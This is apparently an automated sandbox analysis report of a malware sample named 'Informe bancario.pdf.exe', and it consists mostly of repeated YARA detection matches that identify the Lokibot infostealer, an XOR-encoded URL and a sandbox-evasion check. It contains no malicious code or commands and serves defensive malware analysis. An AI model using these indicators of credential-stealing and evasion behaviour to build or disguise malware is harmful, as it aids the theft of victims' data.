Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Informe bancario.pdf.exe

Source: Informe bancario.pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA841
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA641
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA276
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA141
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA541
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA741
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA96F
Source: C:\Users\user\Desktop\Informe bancario.pdf.exe	Code function: 0_2_004BA36E
